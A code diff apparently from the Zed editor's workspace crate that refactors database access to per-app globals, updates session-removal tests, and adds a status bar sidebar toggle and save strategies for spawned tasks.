@@ -4098,7 +4158,7 @@ mod tests {
}
#[gpui::test]
- async fn test_remove_workspace_deletes_db_row(cx: &mut gpui::TestAppContext) {
+ async fn test_remove_workspace_clears_session_binding(cx: &mut gpui::TestAppContext) {
use crate::multi_workspace::MultiWorkspace;
use feature_flags::FeatureFlagAppExt;
use gpui::AppContext as _;
@@ -4112,6 +4172,7 @@ mod tests {
});
let fs = fs::FakeFs::new(cx.executor());
+ let dir = unique_test_dir(&fs, "remove").await;
let project1 = Project::test(fs.clone(), [], cx).await;
let project2 = Project::test(fs.clone(), [], cx).await;
@@ -4122,8 +4183,10 @@ mod tests {
mw.set_random_database_id(cx);
});
+ let db = cx.update(|_, cx| WorkspaceDb::global(cx));
+
// Get a real DB id for workspace2 so the row actually exists.
- let workspace2_db_id = DB.next_id().await.unwrap();
+ let workspace2_db_id = db.next_id().await.unwrap();
multi_workspace.update_in(cx, |mw, window, cx| {
let workspace = cx.new(|cx| crate::Workspace::test_new(project2.clone(), window, cx));
@@ -4134,16 +4197,17 @@ mod tests {
});
// Save a full workspace row to the DB directly.
- DB.save_workspace(SerializedWorkspace {
+ let session_id = format!("remove-test-session-{}", Uuid::new_v4());
+ db.save_workspace(SerializedWorkspace {
id: workspace2_db_id,
- paths: PathList::new(&["/tmp/remove_test"]),
+ paths: PathList::new(&[&dir]),
location: SerializedWorkspaceLocation::Local,
center_group: Default::default(),
window_bounds: Default::default(),
display: Default::default(),
docks: Default::default(),
centered_layout: false,
- session_id: Some("remove-test-session".to_owned()),
+ session_id: Some(session_id.clone()),
breakpoints: Default::default(),
window_id: Some(99),
user_toolchains: Default::default(),
@@ -4151,7 +4215,7 @@ mod tests {
.await;
assert!(
- DB.workspace_for_id(workspace2_db_id).is_some(),
+ db.workspace_for_id(workspace2_db_id).is_some(),
"Workspace2 should exist in DB before removal"
);
@@ -4162,10 +4226,25 @@ mod tests {
cx.run_until_parked();
- // The row should be deleted, not just have session_id cleared.
+ // The row should still exist so it continues to appear in recent
+ // projects, but the session binding should be cleared so it is not
+ // restored as part of any future session.
assert!(
- DB.workspace_for_id(workspace2_db_id).is_none(),
- "Removed workspace's DB row should be deleted entirely"
+ db.workspace_for_id(workspace2_db_id).is_some(),
+ "Removed workspace's DB row should be preserved for recent projects"
+ );
+
+ let session_workspaces = db
+ .last_session_workspace_locations("remove-test-session", None, fs.as_ref())
+ .await
+ .unwrap();
+ let restored_ids: Vec<WorkspaceId> = session_workspaces
+ .iter()
+ .map(|sw| sw.workspace_id)
+ .collect();
+ assert!(
+ !restored_ids.contains(&workspace2_db_id),
+ "Removed workspace should not appear in session restoration"
);
}
@@ -4192,9 +4271,11 @@ mod tests {
let project1 = Project::test(fs.clone(), [], cx).await;
let project2 = Project::test(fs.clone(), [], cx).await;
+ let db = cx.update(|cx| WorkspaceDb::global(cx));
+
// Get real DB ids so the rows actually exist.
- let ws1_id = DB.next_id().await.unwrap();
- let ws2_id = DB.next_id().await.unwrap();
+ let ws1_id = db.next_id().await.unwrap();
+ let ws2_id = db.next_id().await.unwrap();
let (multi_workspace, cx) =
cx.add_window_view(|window, cx| MultiWorkspace::test_new(project1.clone(), window, cx));
@@ -4216,7 +4297,7 @@ mod tests {
let session_id = "test-zombie-session";
let window_id_val: u64 = 42;
- DB.save_workspace(SerializedWorkspace {
+ db.save_workspace(SerializedWorkspace {
id: ws1_id,
paths: PathList::new(&[dir1.path()]),
location: SerializedWorkspaceLocation::Local,
@@ -4232,7 +4313,7 @@ mod tests {
})
.await;
- DB.save_workspace(SerializedWorkspace {
+ db.save_workspace(SerializedWorkspace {
id: ws2_id,
paths: PathList::new(&[dir2.path()]),
location: SerializedWorkspaceLocation::Local,
@@ -4256,7 +4337,7 @@ mod tests {
cx.run_until_parked();
// The removed workspace should NOT appear in session restoration.
- let locations = DB
+ let locations = db
.last_session_workspace_locations(session_id, None, fs.as_ref())
.await
.unwrap();
@@ -4288,11 +4369,14 @@ mod tests {
});
let fs = fs::FakeFs::new(cx.executor());
+ let dir = unique_test_dir(&fs, "pending-removal").await;
let project1 = Project::test(fs.clone(), [], cx).await;
let project2 = Project::test(fs.clone(), [], cx).await;
+ let db = cx.update(|cx| WorkspaceDb::global(cx));
+
// Get a real DB id for workspace2 so the row actually exists.
- let workspace2_db_id = DB.next_id().await.unwrap();
+ let workspace2_db_id = db.next_id().await.unwrap();
let (multi_workspace, cx) =
cx.add_window_view(|window, cx| MultiWorkspace::test_new(project1.clone(), window, cx));
@@ -4310,16 +4394,17 @@ mod tests {
});
// Save a full workspace row to the DB directly and let it settle.
- DB.save_workspace(SerializedWorkspace {
+ let session_id = format!("pending-removal-session-{}", Uuid::new_v4());
+ db.save_workspace(SerializedWorkspace {
id: workspace2_db_id,
- paths: PathList::new(&["/tmp/pending_removal_test"]),
+ paths: PathList::new(&[&dir]),
location: SerializedWorkspaceLocation::Local,
center_group: Default::default(),
window_bounds: Default::default(),
display: Default::default(),
docks: Default::default(),
centered_layout: false,
- session_id: Some("pending-removal-session".to_owned()),
+ session_id: Some(session_id.clone()),
breakpoints: Default::default(),
window_id: Some(88),
user_toolchains: Default::default(),
@@ -4353,10 +4438,24 @@ mod tests {
});
futures::future::join_all(all_tasks).await;
- // After awaiting, the DB row should be deleted.
+ // The row should still exist (for recent projects), but the session
+ // binding should have been cleared by the pending removal task.
assert!(
- DB.workspace_for_id(workspace2_db_id).is_none(),
- "Pending removal task should have deleted the workspace row when awaited"
+ db.workspace_for_id(workspace2_db_id).is_some(),
+ "Workspace row should be preserved for recent projects"
+ );
+
+ let session_workspaces = db
+ .last_session_workspace_locations("pending-removal-session", None, fs.as_ref())
+ .await
+ .unwrap();
+ let restored_ids: Vec<WorkspaceId> = session_workspaces
+ .iter()
+ .map(|sw| sw.workspace_id)
+ .collect();
+ assert!(
+ !restored_ids.contains(&workspace2_db_id),
+ "Pending removal task should have cleared the session binding"
);
}
@@ -4383,11 +4482,9 @@ mod tests {
mw.set_random_database_id(cx);
});
- multi_workspace.update_in(cx, |mw, window, cx| {
- mw.create_workspace(window, cx);
- });
-
- cx.run_until_parked();
+ let task =
+ multi_workspace.update_in(cx, |mw, window, cx| mw.create_test_workspace(window, cx));
+ task.await;
let new_workspace_db_id =
multi_workspace.read_with(cx, |mw, cx| mw.workspace().read(cx).database_id());
@@ -4398,8 +4495,10 @@ mod tests {
let workspace_id = new_workspace_db_id.unwrap();
+ let db = cx.update(|_, cx| WorkspaceDb::global(cx));
+
assert!(
- DB.workspace_for_id(workspace_id).is_some(),
+ db.workspace_for_id(workspace_id).is_some(),
"The workspace row should exist in the DB"
);
@@ -4410,7 +4509,7 @@ mod tests {
cx.executor().advance_clock(Duration::from_millis(200));
cx.run_until_parked();
- let serialized = DB
+ let serialized = db
.workspace_for_id(workspace_id)
.expect("workspace row should still exist");
assert!(
@@ -4443,7 +4542,8 @@ mod tests {
let (multi_workspace, cx) =
cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx));
- let workspace_id = DB.next_id().await.unwrap();
+ let db = cx.update(|_, cx| WorkspaceDb::global(cx));
+ let workspace_id = db.next_id().await.unwrap();
multi_workspace.update_in(cx, |mw, _, cx| {
mw.workspace().update(cx, |ws, _cx| {
ws.set_database_id(workspace_id);
@@ -4456,7 +4556,7 @@ mod tests {
});
task.await;
- let after = DB
+ let after = db
.workspace_for_id(workspace_id)
.expect("workspace row should exist after flush_serialization");
assert!(
@@ -4469,4 +4569,116 @@ mod tests {
before the process exits."
);
}
+
+ #[gpui::test]
+ async fn test_resolve_worktree_workspaces(cx: &mut gpui::TestAppContext) {
+ let fs = fs::FakeFs::new(cx.executor());
+
+ // Main repo with a linked worktree entry
+ fs.insert_tree(
+ "/repo",
+ json!({
+ ".git": {
+ "worktrees": {
+ "feature": {
+ "commondir": "../../",
+ "HEAD": "ref: refs/heads/feature"
+ }
+ }
+ },
+ "src": { "main.rs": "" }
+ }),
+ )
+ .await;
+
+ // Linked worktree checkout pointing back to /repo
+ fs.insert_tree(
+ "/worktree",
+ json!({
+ ".git": "gitdir: /repo/.git/worktrees/feature",
+ "src": { "main.rs": "" }
+ }),
+ )
+ .await;
+
+ // A plain non-git project
+ fs.insert_tree(
+ "/plain-project",
+ json!({
+ "src": { "main.rs": "" }
+ }),
+ )
+ .await;
+
+ // Another normal git repo (used in mixed-path entry)
+ fs.insert_tree(
+ "/other-repo",
+ json!({
+ ".git": {},
+ "src": { "lib.rs": "" }
+ }),
+ )
+ .await;
+
+ let t0 = Utc::now() - chrono::Duration::hours(4);
+ let t1 = Utc::now() - chrono::Duration::hours(3);
+ let t2 = Utc::now() - chrono::Duration::hours(2);
+ let t3 = Utc::now() - chrono::Duration::hours(1);
+
+ let workspaces = vec![
+ // 1: Main checkout of /repo (opened earlier)
+ (
+ WorkspaceId(1),
+ SerializedWorkspaceLocation::Local,
+ PathList::new(&["/repo"]),
+ t0,
+ ),
+ // 2: Linked worktree of /repo (opened more recently)
+ // Should dedup with #1; more recent timestamp wins.
+ (
+ WorkspaceId(2),
+ SerializedWorkspaceLocation::Local,
+ PathList::new(&["/worktree"]),
+ t1,
+ ),
+ // 3: Mixed-path workspace: one root is a linked worktree,
+ // the other is a normal repo. The worktree path should be
+ // resolved; the normal path kept as-is.
+ (
+ WorkspaceId(3),
+ SerializedWorkspaceLocation::Local,
+ PathList::new(&["/other-repo", "/worktree"]),
+ t2,
+ ),
+ // 4: Non-git project — passed through unchanged.
+ (
+ WorkspaceId(4),
+ SerializedWorkspaceLocation::Local,
+ PathList::new(&["/plain-project"]),
+ t3,
+ ),
+ ];
+
+ let result = resolve_worktree_workspaces(workspaces, fs.as_ref()).await;
+
+ // Should have 3 entries: #1 and #2 deduped into one, plus #3 and #4.
+ assert_eq!(result.len(), 3);
+
+ // First entry: /repo — deduplicated from #1 and #2.
+ // Keeps the position of #1 (first seen), but with #2's later timestamp.
+ assert_eq!(result[0].2.paths(), &[PathBuf::from("/repo")]);
+ assert_eq!(result[0].3, t1);
+
+ // Second entry: mixed-path workspace with worktree resolved.
+ // /worktree → /repo, so paths become [/other-repo, /repo] (sorted).
+ assert_eq!(
+ result[1].2.paths(),
+ &[PathBuf::from("/other-repo"), PathBuf::from("/repo")]
+ );
+ assert_eq!(result[1].0, WorkspaceId(3));
+
+ // Third entry: non-git project, unchanged.
+ assert_eq!(result[2].2.paths(), &[PathBuf::from("/plain-project")]);
+ assert_eq!(result[2].0, WorkspaceId(4));
+ }
}
@@ -1,11 +1,11 @@
-use crate::{ItemHandle, Pane};
+use crate::{ItemHandle, MultiWorkspace, Pane, ToggleWorkspaceSidebar};
use gpui::{
AnyView, App, Context, Decorations, Entity, IntoElement, ParentElement, Render, Styled,
Subscription, Window,
};
use std::any::TypeId;
use theme::CLIENT_SIDE_DECORATION_ROUNDING;
-use ui::{h_flex, prelude::*};
+use ui::{Divider, Indicator, Tooltip, prelude::*};
use util::ResultExt;
pub trait StatusItemView: Render {
@@ -35,6 +35,8 @@ pub struct StatusBar {
active_pane: Entity<Pane>,
_observe_active_pane: Subscription,
workspace_sidebar_open: bool,
+ sidebar_has_notifications: bool,
+ show_sidebar_toggle: bool,
}
impl Render for StatusBar {
@@ -43,8 +45,7 @@ impl Render for StatusBar {
.w_full()
.justify_between()
.gap(DynamicSpacing::Base08.rems(cx))
- .py(DynamicSpacing::Base04.rems(cx))
- .px(DynamicSpacing::Base06.rems(cx))
+ .p(DynamicSpacing::Base04.rems(cx))
.bg(cx.theme().colors().status_bar_background)
.map(|el| match window.window_decorations() {
Decorations::Server => el,
@@ -61,25 +62,58 @@ impl Render for StatusBar {
.border_b(px(1.0))
.border_color(cx.theme().colors().status_bar_background),
})
- .child(self.render_left_tools())
+ .child(self.render_left_tools(cx))
.child(self.render_right_tools())
}
}
impl StatusBar {
- fn render_left_tools(&self) -> impl IntoElement {
+ fn render_left_tools(&self, cx: &mut Context<Self>) -> impl IntoElement {
h_flex()
.gap_1()
+ .min_w_0()
.overflow_x_hidden()
+ .when(
+ self.show_sidebar_toggle && !self.workspace_sidebar_open,
+ |this| this.child(self.render_sidebar_toggle(cx)),
+ )
.children(self.left_items.iter().map(|item| item.to_any()))
}
fn render_right_tools(&self) -> impl IntoElement {
h_flex()
+ .flex_shrink_0()
.gap_1()
.overflow_x_hidden()
.children(self.right_items.iter().rev().map(|item| item.to_any()))
}
+
+ fn render_sidebar_toggle(&self, cx: &mut Context<Self>) -> impl IntoElement {
+ h_flex()
+ .gap_0p5()
+ .child(
+ IconButton::new(
+ "toggle-workspace-sidebar",
+ IconName::ThreadsSidebarLeftClosed,
+ )
+ .icon_size(IconSize::Small)
+ .when(self.sidebar_has_notifications, |this| {
+ this.indicator(Indicator::dot().color(Color::Accent))
+ .indicator_border_color(Some(cx.theme().colors().status_bar_background))
+ })
+ .tooltip(move |_, cx| {
+ Tooltip::for_action("Open Threads Sidebar", &ToggleWorkspaceSidebar, cx)
+ })
+ .on_click(move |_, window, cx| {
+ if let Some(multi_workspace) = window.root::<MultiWorkspace>().flatten() {
+ multi_workspace.update(cx, |multi_workspace, cx| {
+ multi_workspace.toggle_sidebar(window, cx);
+ });
+ }
+ }),
+ )
+ .child(Divider::vertical().color(ui::DividerColor::Border))
+ }
}
impl StatusBar {
@@ -92,6 +126,8 @@ impl StatusBar {
this.update_active_pane_item(window, cx)
}),
workspace_sidebar_open: false,
+ sidebar_has_notifications: false,
+ show_sidebar_toggle: false,
};
this.update_active_pane_item(window, cx);
this
@@ -102,6 +138,16 @@ impl StatusBar {
cx.notify();
}
+ pub fn set_sidebar_has_notifications(&mut self, has: bool, cx: &mut Context<Self>) {
+ self.sidebar_has_notifications = has;
+ cx.notify();
+ }
+
+ pub fn set_show_sidebar_toggle(&mut self, show: bool, cx: &mut Context<Self>) {
+ self.show_sidebar_toggle = show;
+ cx.notify();
+ }
+
pub fn add_left_item<T>(&mut self, item: Entity<T>, window: &mut Window, cx: &mut Context<Self>)
where
T: 'static + StatusItemView,
@@ -6,11 +6,13 @@ use language::Buffer;
use project::{TaskSourceKind, WorktreeId};
use remote::ConnectionState;
use task::{
- DebugScenario, ResolvedTask, SharedTaskContext, SpawnInTerminal, TaskContext, TaskTemplate,
+ DebugScenario, ResolvedTask, SaveStrategy, SharedTaskContext, SpawnInTerminal, TaskContext,
+ TaskTemplate,
};
use ui::Window;
+use util::TryFutureExt;
-use crate::{Toast, Workspace, notifications::NotificationId};
+use crate::{SaveIntent, Toast, Workspace, notifications::NotificationId};
impl Workspace {
pub fn schedule_task(
@@ -73,28 +75,57 @@ impl Workspace {
});
}
- if let Some(terminal_provider) = self.terminal_provider.as_ref() {
- let task_status = terminal_provider.spawn(spawn_in_terminal, window, cx);
-
- let task = cx.spawn(async |w, cx| {
- let res = cx.background_spawn(task_status).await;
- match res {
- Some(Ok(status)) => {
- if status.success() {
- log::debug!("Task spawn succeeded");
- } else {
- log::debug!("Task spawn failed, code: {:?}", status.code());
- }
+ if self.terminal_provider.is_some() {
+ let task = cx.spawn_in(window, async move |workspace, cx| {
+ let save_action = match spawn_in_terminal.save {
+ SaveStrategy::All => {
+ let save_all = workspace.update_in(cx, |workspace, window, cx| {
+ let task = workspace.save_all_internal(SaveIntent::SaveAll, window, cx);
+ // Match the type of the other arm by ignoring the bool value returned
+ cx.background_spawn(async { task.await.map(|_| ()) })
+ });
+ save_all.ok()
}
- Some(Err(e)) => {
- log::error!("Task spawn failed: {e:#}");
- _ = w.update(cx, |w, cx| {
- let id = NotificationId::unique::<ResolvedTask>();
- w.show_toast(Toast::new(id, format!("Task spawn failed: {e}")), cx);
- })
+ SaveStrategy::Current => {
+ let save_current = workspace.update_in(cx, |workspace, window, cx| {
+ workspace.save_active_item(SaveIntent::SaveAll, window, cx)
+ });
+ save_current.ok()
}
- None => log::debug!("Task spawn got cancelled"),
+ SaveStrategy::None => None,
};
+ if let Some(save_action) = save_action {
+ save_action.log_err().await;
+ }
+
+ let spawn_task = workspace.update_in(cx, |workspace, window, cx| {
+ workspace
+ .terminal_provider
+ .as_ref()
+ .map(|terminal_provider| {
+ terminal_provider.spawn(spawn_in_terminal, window, cx)
+ })
+ });
+ if let Some(spawn_task) = spawn_task.ok().flatten() {
+ let res = cx.background_spawn(spawn_task).await;
+ match res {
+ Some(Ok(status)) => {
+ if status.success() {
+ log::debug!("Task spawn succeeded");
+ } else {
+ log::debug!("Task spawn failed, code: {:?}", status.code());
+ }
+ }
+ Some(Err(e)) => {
+ log::error!("Task spawn failed: {e:#}");
+ _ = workspace.update(cx, |w, cx| {
+ let id = NotificationId::unique::<ResolvedTask>();
+ w.show_toast(Toast::new(id, format!("Task spawn failed: {e}")), cx);
+ })
+ }
+ None => log::debug!("Task spawn got cancelled"),
+ };
+ }
});
self.scheduled_tasks.push(task);
}
@@ -134,3 +165,166 @@ impl Workspace {
}
}
}
+
+#[cfg(test)]
+mod tests {
+ use super::*;
+ use crate::{
+ TerminalProvider,
+ item::test::{TestItem, TestProjectItem},
+ register_serializable_item,
+ };
+ use gpui::{App, TestAppContext};
+ use parking_lot::Mutex;
+ use project::{FakeFs, Project, TaskSourceKind};
+ use serde_json::json;
+ use std::sync::Arc;
+ use task::TaskTemplate;
+
+ struct Fixture {
+ workspace: Entity<Workspace>,
+ item: Entity<TestItem>,
+ task: ResolvedTask,
+ dirty_before_spawn: Arc<Mutex<Option<bool>>>,
+ }
+
+ #[gpui::test]
+ async fn test_schedule_resolved_task_save_all(cx: &mut TestAppContext) {
+ let (fixture, cx) = create_fixture(cx, SaveStrategy::All).await;
+ fixture.workspace.update_in(cx, |workspace, window, cx| {
+ workspace.schedule_resolved_task(
+ TaskSourceKind::UserInput,
+ fixture.task,
+ false,
+ window,
+ cx,
+ );
+ });
+ cx.executor().run_until_parked();
+
+ assert_eq!(*fixture.dirty_before_spawn.lock(), Some(false));
+ assert!(cx.read(|cx| !fixture.item.read(cx).is_dirty));
+ }
+
+ #[gpui::test]
+ async fn test_schedule_resolved_task_save_current(cx: &mut TestAppContext) {
+ let (fixture, cx) = create_fixture(cx, SaveStrategy::Current).await;
+ // Add a second inactive dirty item
+ let inactive = add_test_item(&fixture.workspace, "file2.txt", false, cx);
+ fixture.workspace.update_in(cx, |workspace, window, cx| {
+ workspace.schedule_resolved_task(
+ TaskSourceKind::UserInput,
+ fixture.task,
+ false,
+ window,
+ cx,
+ );
+ });
+ cx.executor().run_until_parked();
+
+ // The active item (fixture.item) should be saved
+ assert_eq!(*fixture.dirty_before_spawn.lock(), Some(false));
+ assert!(cx.read(|cx| !fixture.item.read(cx).is_dirty));
+ // The inactive item should not be saved
+ assert!(cx.read(|cx| inactive.read(cx).is_dirty));
+ }
+
+ #[gpui::test]
+ async fn test_schedule_resolved_task_save_none(cx: &mut TestAppContext) {
+ let (fixture, cx) = create_fixture(cx, SaveStrategy::None).await;
+ fixture.workspace.update_in(cx, |workspace, window, cx| {
+ workspace.schedule_resolved_task(
+ TaskSourceKind::UserInput,
+ fixture.task,
+ false,
+ window,
+ cx,
+ );
+ });
+ cx.executor().run_until_parked();
+
+ assert_eq!(*fixture.dirty_before_spawn.lock(), Some(true));
+ assert!(cx.read(|cx| fixture.item.read(cx).is_dirty));
+ }
+
+ async fn create_fixture(
+ cx: &mut TestAppContext,
+ save_strategy: SaveStrategy,
+ ) -> (Fixture, &mut gpui::VisualTestContext) {
+ cx.update(|cx| {
+ let settings_store = settings::SettingsStore::test(cx);
+ cx.set_global(settings_store);
+ theme::init(theme::LoadThemes::JustBase, cx);
+ register_serializable_item::<TestItem>(cx);
+ });
+ let fs = FakeFs::new(cx.executor());
+ fs.insert_tree("/root", json!({ "file.txt": "dirty" }))
+ .await;
+ let project = Project::test(fs.clone(), ["/root".as_ref()], cx).await;
+ let (workspace, cx) =
+ cx.add_window_view(|window, cx| Workspace::test_new(project.clone(), window, cx));
+
+ // Add a dirty item to the workspace
+ let item = add_test_item(&workspace, "file.txt", true, cx);
+
+ let template = TaskTemplate {
+ label: "test".to_string(),
+ command: "echo".to_string(),
+ save: save_strategy,
+ ..Default::default()
+ };
+ let task = template
+ .resolve_task("test", &task::TaskContext::default())
+ .unwrap();
+ let dirty_before_spawn: Arc<Mutex<Option<bool>>> = Arc::default();
+ let terminal_provider = Box::new(TestTerminalProvider {
+ item: item.clone(),
+ dirty_before_spawn: dirty_before_spawn.clone(),
+ });
+ workspace.update(cx, |workspace, _| {
+ workspace.terminal_provider = Some(terminal_provider);
+ });
+ let fixture = Fixture {
+ workspace,
+ item,
+ task,
+ dirty_before_spawn,
+ };
+ (fixture, cx)
+ }
+
+ fn add_test_item(
+ workspace: &Entity<Workspace>,
+ name: &str,
+ active: bool,
+ cx: &mut gpui::VisualTestContext,
+ ) -> Entity<TestItem> {
+ let item = cx.new(|cx| {
+ TestItem::new(cx)
+ .with_dirty(true)
+ .with_project_items(&[TestProjectItem::new(1, name, cx)])
+ });
+ workspace.update_in(cx, |workspace, window, cx| {
+ let pane = workspace.active_pane().clone();
+ workspace.add_item(pane, Box::new(item.clone()), None, true, active, window, cx);
+ });
+ item
+ }
+
+ struct TestTerminalProvider {
+ item: Entity<TestItem>,
+ dirty_before_spawn: Arc<Mutex<Option<bool>>>,
+ }
+
+ impl TerminalProvider for TestTerminalProvider {
+ fn spawn(
+ &self,
+ _task: task::SpawnInTerminal,
+ _window: &mut ui::Window,
+ cx: &mut App,
+ ) -> Task<Option<Result<ExitStatus>>> {
+ *self.dirty_before_spawn.lock() = Some(cx.read_entity(&self.item, |e, _| e.is_dirty));
+ Task::ready(Some(Ok(ExitStatus::default())))
+ }
+ }
+}
@@ -1,6 +1,7 @@
use crate::{
- NewFile, Open, PathList, SerializedWorkspaceLocation, WORKSPACE_DB, Workspace, WorkspaceId,
+ NewFile, Open, PathList, SerializedWorkspaceLocation, Workspace, WorkspaceId,
item::{Item, ItemEvent},
+ persistence::WorkspaceDb,
};
use chrono::{DateTime, Utc};
use git::Clone as GitClone;
@@ -271,9 +272,10 @@ impl WelcomePage {
let fs = workspace
.upgrade()
.map(|ws| ws.read(cx).app_state().fs.clone());
+ let db = WorkspaceDb::global(cx);
cx.spawn_in(window, async move |this: WeakEntity<Self>, cx| {
let Some(fs) = fs else { return };
- let workspaces = WORKSPACE_DB
+ let workspaces = db
.recent_workspaces_on_disk(fs.as_ref())
.await
.log_err()
@@ -518,7 +520,7 @@ impl crate::SerializableItem for WelcomePage {
alive_items,
workspace_id,
"welcome_pages",
- &persistence::WELCOME_PAGES,
+ &persistence::WelcomePagesDb::global(cx),
cx,
)
}
@@ -531,7 +533,7 @@ impl crate::SerializableItem for WelcomePage {
window: &mut Window,
cx: &mut App,
) -> Task<gpui::Result<Entity<Self>>> {
- if persistence::WELCOME_PAGES
+ if persistence::WelcomePagesDb::global(cx)
.get_welcome_page(item_id, workspace_id)
.ok()
.is_some_and(|is_open| is_open)
@@ -553,11 +555,10 @@ impl crate::SerializableItem for WelcomePage {
cx: &mut Context<Self>,
) -> Option<Task<gpui::Result<()>>> {
let workspace_id = workspace.database_id()?;
- Some(cx.background_spawn(async move {
- persistence::WELCOME_PAGES
- .save_welcome_page(item_id, workspace_id, true)
- .await
- }))
+ let db = persistence::WelcomePagesDb::global(cx);
+ Some(cx.background_spawn(
+ async move { db.save_welcome_page(item_id, workspace_id, true).await },
+ ))
}
fn should_serialize(&self, event: &Self::Event) -> bool {
@@ -591,7 +592,7 @@ mod persistence {
)]);
}
- db::static_connection!(WELCOME_PAGES, WelcomePagesDb, [WorkspaceDb]);
+ db::static_connection!(WelcomePagesDb, [WorkspaceDb]);
impl WelcomePagesDb {
query! {
@@ -27,9 +27,9 @@ mod workspace_settings;
pub use crate::notifications::NotificationFrame;
pub use dock::Panel;
pub use multi_workspace::{
- DraggedSidebar, FocusWorkspaceSidebar, MultiWorkspace, MultiWorkspaceEvent,
- NewWorkspaceInWindow, NextWorkspaceInWindow, PreviousWorkspaceInWindow, Sidebar, SidebarEvent,
- SidebarHandle, ToggleWorkspaceSidebar,
+ CloseWorkspaceSidebar, DraggedSidebar, FocusWorkspaceSidebar, MultiWorkspace,
+ MultiWorkspaceEvent, NextWorkspace, PreviousWorkspace, Sidebar, SidebarHandle,
+ ToggleWorkspaceSidebar,
};
pub use path_list::{PathList, SerializedPathList};
pub use toast_layer::{ToastAction, ToastLayer, ToastView};
@@ -76,14 +76,14 @@ pub use pane_group::{
ActivePaneDecorator, HANDLE_HITBOX_SIZE, Member, PaneAxis, PaneGroup, PaneRenderContext,
SplitDirection,
};
-use persistence::{DB, SerializedWindowBounds, model::SerializedWorkspace};
+use persistence::{SerializedWindowBounds, model::SerializedWorkspace};
pub use persistence::{
- DB as WORKSPACE_DB, WorkspaceDb, delete_unloaded_items,
+ WorkspaceDb, delete_unloaded_items,
model::{
DockStructure, ItemId, SerializedMultiWorkspace, SerializedWorkspaceLocation,
SessionWorkspace,
},
- read_serialized_multi_workspaces,
+ read_serialized_multi_workspaces, resolve_worktree_workspaces,
};
use postage::stream::Stream;
use project::{
@@ -146,7 +146,7 @@ pub use workspace_settings::{
AutosaveSetting, BottomDockLayout, RestoreOnStartupBehavior, StatusBarSettings, TabBarSettings,
WorkspaceSettings,
};
-use zed_actions::{Spawn, feedback::FileBugReport};
+use zed_actions::{Spawn, feedback::FileBugReport, theme::ToggleMode};
use crate::{item::ItemBufferKind, notifications::NotificationId};
use crate::{
@@ -400,7 +400,12 @@ pub struct Save {
pub save_intent: Option<SaveIntent>,
}
-/// Closes all items and panes in the workspace.
+/// Moves Focus to the central panes in the workspace.
+#[derive(Clone, Debug, PartialEq, Eq, Action)]
+#[action(namespace = workspace)]
+pub struct FocusCenterPane;
+
+/// Closes all items and panes in the workspace.
#[derive(Clone, PartialEq, Debug, Deserialize, Default, JsonSchema, Action)]
#[action(namespace = workspace)]
#[serde(deny_unknown_fields)]
@@ -659,7 +664,7 @@ fn prompt_and_open_paths(app_state: Arc<AppState>, options: PathPromptOptions, c
} else {
let task = Workspace::new_local(Vec::new(), app_state.clone(), None, None, None, true, cx);
cx.spawn(async move |cx| {
- let (window, _) = task.await?;
+ let OpenResult { window, .. } = task.await?;
window.update(cx, |multi_workspace, window, cx| {
window.activate_window();
let workspace = multi_workspace.workspace().clone();
@@ -1336,6 +1341,7 @@ pub struct Workspace {
last_open_dock_positions: Vec<DockPosition>,
removing: bool,
_panels_task: Option<Task<Result<()>>>,
+ sidebar_focus_handle: Option<FocusHandle>,
}
impl EventEmitter<Event> for Workspace {}
@@ -1377,10 +1383,10 @@ impl Workspace {
|new_trusted_worktrees, cx| {
let timeout =
cx.background_executor().timer(SERIALIZATION_THROTTLE_TIME);
+ let db = WorkspaceDb::global(cx);
cx.background_spawn(async move {
timeout.await;
- persistence::DB
- .save_trusted_worktrees(new_trusted_worktrees)
+ db.save_trusted_worktrees(new_trusted_worktrees)
.await
.log_err();
})
@@ -1414,7 +1420,13 @@ impl Workspace {
this.collaborator_left(*peer_id, window, cx);
}
- &project::Event::WorktreeRemoved(id) | &project::Event::WorktreeAdded(id) => {
+ &project::Event::WorktreeRemoved(_) => {
+ this.update_window_title(window, cx);
+ this.serialize_workspace(window, cx);
+ this.update_history(cx);
+ }
+
+ &project::Event::WorktreeAdded(id) => {
this.update_window_title(window, cx);
if this
.project()
@@ -1741,6 +1753,7 @@ impl Workspace {
scheduled_tasks: Vec::new(),
last_open_dock_positions: Vec::new(),
removing: false,
+ sidebar_focus_handle: None,
}
}
@@ -1752,12 +1765,7 @@ impl Workspace {
init: Option<Box<dyn FnOnce(&mut Workspace, &mut Window, &mut Context<Workspace>) + Send>>,
activate: bool,
cx: &mut App,
- ) -> Task<
- anyhow::Result<(
- WindowHandle<MultiWorkspace>,
- Vec<Option<anyhow::Result<Box<dyn ItemHandle>>>>,
- )>,
- > {
+ ) -> Task<anyhow::Result<OpenResult>> {
let project_handle = Project::local(
app_state.client.clone(),
app_state.node_runtime.clone(),
@@ -1769,6 +1777,8 @@ impl Workspace {
cx,
);
+ let db = WorkspaceDb::global(cx);
+ let kvp = db::kvp::KeyValueStore::global(cx);
cx.spawn(async move |cx| {
let mut paths_to_open = Vec::with_capacity(abs_paths.len());
for path in abs_paths.into_iter() {
@@ -1779,8 +1789,7 @@ impl Workspace {
}
}
- let serialized_workspace =
- persistence::DB.workspace_for_roots(paths_to_open.as_slice());
+ let serialized_workspace = db.workspace_for_roots(paths_to_open.as_slice());
if let Some(paths) = serialized_workspace.as_ref().map(|ws| &ws.paths) {
paths_to_open = paths.ordered_paths().cloned().collect();
@@ -1812,10 +1821,10 @@ impl Workspace {
let workspace_id = if let Some(serialized_workspace) = serialized_workspace.as_ref() {
serialized_workspace.id
} else {
- DB.next_id().await.unwrap_or_else(|_| Default::default())
+ db.next_id().await.unwrap_or_else(|_| Default::default())
};
- let toolchains = DB.toolchains(workspace_id).await?;
+ let toolchains = db.toolchains(workspace_id).await?;
for (toolchain, worktree_path, path) in toolchains {
let toolchain_path = PathBuf::from(toolchain.path.clone().to_string());
@@ -1898,7 +1907,7 @@ impl Workspace {
// Reopening an existing workspace - restore its saved bounds
(Some(bounds.0), Some(display))
} else if let Some((display, bounds)) =
- persistence::read_default_window_bounds()
+ persistence::read_default_window_bounds(&kvp)
{
// New or empty workspace - use the last known window bounds
(Some(bounds), Some(display))
@@ -1969,7 +1978,7 @@ impl Workspace {
// 1. This is an empty workspace (no paths), AND
// 2. The serialized workspace either doesn't exist or has no paths
if is_empty_workspace && !serialized_workspace_has_paths {
- if let Some(default_docks) = persistence::read_default_dock_state() {
+ if let Some(default_docks) = persistence::read_default_dock_state(&kvp) {
window
.update(cx, |_, window, cx| {
workspace.update(cx, |workspace, cx| {
